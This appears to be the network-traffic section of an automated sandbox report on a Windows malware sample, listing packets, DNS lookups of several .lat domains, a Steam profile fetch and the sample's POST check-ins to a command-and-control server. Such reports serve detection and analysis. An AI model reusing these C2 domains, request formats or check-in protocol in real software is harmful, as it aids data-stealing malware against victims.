Dec 27, 2024 14:53:23.040291071 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:23.040333986 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:23.272735119 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.272747040 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.272775888 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.272881985 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:23.272887945 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.272928953 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:23.278650999 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.278762102 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:23.278767109 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.278780937 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.278841019 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:23.280014992 CET	49731	443	192.168.2.6	104.121.10.34
Dec 27, 2024 14:53:23.280030012 CET	443	49731	104.121.10.34	192.168.2.6
Dec 27, 2024 14:53:23.429979086 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:23.430032969 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:23.430139065 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:23.430483103 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:23.430501938 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:24.804598093 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:24.804707050 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:24.844697952 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:24.844739914 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:24.845093012 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:24.869311094 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:24.869338989 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:24.869472980 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:25.563210964 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:25.563342094 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:25.563405991 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:25.563656092 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:25.563678980 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:25.563697100 CET	49741	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:25.563704014 CET	443	49741	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:25.619196892 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:25.619247913 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:25.619333029 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:25.619705915 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:25.619713068 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:26.850621939 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:26.850822926 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:26.852322102 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:26.852338076 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:26.852585077 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:26.853916883 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:26.853959084 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:26.853988886 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.619117975 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.619193077 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.619235039 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.619242907 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.619259119 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.619299889 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.619307995 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.619354010 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.619396925 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.619396925 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.619411945 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.619463921 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.627348900 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.635793924 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.635864973 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.635876894 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.678637028 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.738634109 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.788080931 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.811194897 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.814913988 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.814986944 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.815000057 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.815021992 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.815062046 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.822576046 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.822715998 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.822782040 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.862986088 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.863017082 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:27.863029957 CET	49747	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:27.863037109 CET	443	49747	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:28.865329981 CET	49754	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:28.865384102 CET	443	49754	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:28.865447044 CET	49754	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:28.865950108 CET	49754	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:28.865982056 CET	443	49754	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:30.177582026 CET	443	49754	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:30.177711964 CET	49754	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:30.179135084 CET	49754	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:30.179141998 CET	443	49754	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:30.179436922 CET	443	49754	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:30.180918932 CET	49754	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:30.181118965 CET	49754	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:30.181138039 CET	443	49754	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:31.128539085 CET	443	49754	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:31.128644943 CET	443	49754	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:31.128752947 CET	49754	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:31.235198975 CET	49754	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:31.235230923 CET	443	49754	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:31.937530041 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:31.937608957 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:31.937674999 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:31.937998056 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:31.938013077 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:33.196732998 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:33.196820974 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:33.198278904 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:33.198292017 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:33.198570967 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:33.199861050 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:33.200017929 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:33.200088978 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:33.201819897 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:33.247330904 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:34.065220118 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:34.065385103 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:34.065535069 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:34.065711975 CET	49766	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:34.065732956 CET	443	49766	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:35.148401022 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:35.148519039 CET	443	49775	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:35.148617029 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:35.149286032 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:35.149327040 CET	443	49775	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:36.404860973 CET	443	49775	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:36.404937029 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:36.406264067 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:36.406276941 CET	443	49775	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:36.406547070 CET	443	49775	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:36.416316986 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:36.416502953 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:36.416527033 CET	443	49775	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:36.416590929 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:36.416599989 CET	443	49775	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:37.368855953 CET	443	49775	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:37.368959904 CET	443	49775	172.67.157.254	192.168.2.6
Dec 27, 2024 14:53:37.369128942 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:37.376379013 CET	49775	443	192.168.2.6	172.67.157.254
Dec 27, 2024 14:53:37.376408100 CET	443	49775	172.67.157.254	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 14:53:16.812482119 CET	64596	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:17.372131109 CET	53	64596	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:17.380557060 CET	56432	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:17.600172043 CET	53	56432	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:17.603367090 CET	60290	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:17.987828970 CET	53	60290	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:17.991744041 CET	54193	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:18.369776964 CET	53	54193	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:18.379044056 CET	52984	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:18.690421104 CET	53	52984	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:18.896295071 CET	65480	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:19.125397921 CET	53	65480	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:19.128895998 CET	49675	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:19.356548071 CET	53	49675	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:19.359483004 CET	58652	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:19.667393923 CET	53	58652	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:19.674741983 CET	61991	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:20.060811996 CET	53	61991	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:20.064352036 CET	56816	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:20.285171986 CET	53	56816	1.1.1.1	192.168.2.6
Dec 27, 2024 14:53:23.284032106 CET	59015	53	192.168.2.6	1.1.1.1
Dec 27, 2024 14:53:23.428061008 CET	53	59015	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 14:53:16.812482119 CET	192.168.2.6	1.1.1.1	0x6bcf	Standard query (0)	driblbemris.lat	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:17.380557060 CET	192.168.2.6	1.1.1.1	0xbd98	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:17.603367090 CET	192.168.2.6	1.1.1.1	0xa84e	Standard query (0)	discokeyus.lat	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:17.991744041 CET	192.168.2.6	1.1.1.1	0x72a5	Standard query (0)	necklacebudi.lat	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:18.379044056 CET	192.168.2.6	1.1.1.1	0x8913	Standard query (0)	energyaffai.lat	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:18.896295071 CET	192.168.2.6	1.1.1.1	0xf595	Standard query (0)	aspecteirs.lat	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:19.128895998 CET	192.168.2.6	1.1.1.1	0xee2b	Standard query (0)	sustainskelet.lat	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:19.359483004 CET	192.168.2.6	1.1.1.1	0xd97c	Standard query (0)	crosshuaht.lat	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:19.674741983 CET	192.168.2.6	1.1.1.1	0x2698	Standard query (0)	rapeflowwj.lat	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:20.064352036 CET	192.168.2.6	1.1.1.1	0xde7c	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:23.284032106 CET	192.168.2.6	1.1.1.1	0xdcd3	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 14:53:10.349586010 CET	1.1.1.1	192.168.2.6	0x7517	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2024 14:53:10.349586010 CET	1.1.1.1	192.168.2.6	0x7517	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:17.372131109 CET	1.1.1.1	192.168.2.6	0x6bcf	Name error (3)	driblbemris.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:17.600172043 CET	1.1.1.1	192.168.2.6	0xbd98	Name error (3)	grannyejh.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:17.987828970 CET	1.1.1.1	192.168.2.6	0xa84e	Name error (3)	discokeyus.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:18.369776964 CET	1.1.1.1	192.168.2.6	0x72a5	Name error (3)	necklacebudi.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:18.690421104 CET	1.1.1.1	192.168.2.6	0x8913	Name error (3)	energyaffai.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:19.125397921 CET	1.1.1.1	192.168.2.6	0xf595	Name error (3)	aspecteirs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:19.356548071 CET	1.1.1.1	192.168.2.6	0xee2b	Name error (3)	sustainskelet.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:19.667393923 CET	1.1.1.1	192.168.2.6	0xd97c	Name error (3)	crosshuaht.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:20.060811996 CET	1.1.1.1	192.168.2.6	0x2698	Name error (3)	rapeflowwj.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:20.285171986 CET	1.1.1.1	192.168.2.6	0xde7c	No error (0)	steamcommunity.com		104.121.10.34	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:23.428061008 CET	1.1.1.1	192.168.2.6	0xdcd3	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Dec 27, 2024 14:53:23.428061008 CET	1.1.1.1	192.168.2.6	0xdcd3	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49731	104.121.10.34	443	4344	C:\Users\user\Desktop\IzDjbVdHha.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:53:22 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-27 13:53:23 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 27 Dec 2024 13:53:22 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=fcf517d639678581f7f6c655; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-27 13:53:23 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-27 13:53:23 UTC	16384	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-27 13:53:23 UTC	3768	IN	Data Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22 Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
2024-12-27 13:53:23 UTC	490	IN	Data Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74 Data Ascii: r Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49741	172.67.157.254	443	4344	C:\Users\user\Desktop\IzDjbVdHha.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:53:24 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-27 13:53:24 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 13:53:25 UTC	1125	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:53:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n8n17tfuvraoedmj7r9so2t1ua; expires=Tue, 22 Apr 2025 07:40:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gRCym8A4F8gh8qRAC%2FfenrN6rLTmbzYd98bxym1czYhppjxzZdtTJY8PqMbuh%2Bd3%2BY5NlWkSFQYn2zpZKbl2fEjmzUM33Yv2AFUdHfjqmnH0UEOQ7j37cG%2FO07SwOnSwI4Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89cbf3cb0dc343-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1599&rtt_var=638&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1664766&cwnd=208&unsent_bytes=0&cid=fce4abe4b741fa23&ts=770&x=0"
2024-12-27 13:53:25 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 13:53:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49747	172.67.157.254	443	4344	C:\Users\user\Desktop\IzDjbVdHha.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:53:26 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: lev-tolstoi.com
2024-12-27 13:53:26 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
